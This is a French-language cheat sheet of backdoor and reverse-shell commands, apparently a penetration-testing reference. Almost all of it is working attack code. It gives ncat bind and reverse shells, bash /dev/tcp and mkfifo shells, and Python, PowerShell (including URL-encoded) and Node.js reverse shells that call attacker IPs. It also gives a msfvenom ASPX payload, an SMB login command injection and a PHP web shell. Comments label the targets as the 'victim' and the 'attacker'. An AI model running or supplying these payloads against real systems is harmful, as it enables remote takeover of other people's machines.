Démarrer un backdoor shell sur l’ordinateur victime
# ncat -l -p 1337 -e "/bin/bash -i"
Connecter sur le backdoor
# ncat 192.168.2.6 1337
Écouter pour un shell inversé (sur l’ordinateur de l’attaquant)
# ncat -l -p 23
Démarrer le shell sur la victime et permettre le contrôle sur l’attaquant. shell inversé
# ncat -e "/bin/bash -i" 192.168.2.7 23
Démarrer le shell sur la victime et permettre le contrôle sur l’attaquant, Bash uniquement. shell inversé
#
bash -i &>/dev/tcp/192.168.2.7/23 0>&1
bash -c "bash -i &>/dev/tcp/192.168.2.7/23 0>&1"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.15 5555 >/tmp/f #alternative
Créer un shell inversé en python
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.223",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); pty.spawn("/bin/bash")'
WebShell Windows
powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Avoir un meilleur shell (shell interactive où il y a de l’écho)
#
python -c 'import pty; pty.spawn("/bin/bash")'
Ctl+Z
stty raw -echo
fg
reset
xterm-256color
export $TERM=xterm
export $SHELL=bash
Créer un shell aspx pour Windows IIS
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.0.15 LPORT=4444 — platform windows -a x64 -f aspx -o shell.aspx
Transformation d’un Shell SMB en Shell inversé.
# smbclient -U "username%password" //192.168.0.6/mo_partage
# smb> login "/=nc '192.168.0.222' 4444 -e /bin/bash"
Shell en php
nc -nlvp 1234 #sur l'attaquant
<?php system($_GET['cmd']); ?> // shell.php
http://192.168.2.22/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.2.64%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
Shell en node.js
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4242, "10.0.0.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
Obtenir un meilleur shell (shell interactif)
python -c 'import pty; pty.spawn("/bin/bash")'
socat file:`tty`,raw,echo=0 tcp-listen:4444 #attaquant
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 #victime
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>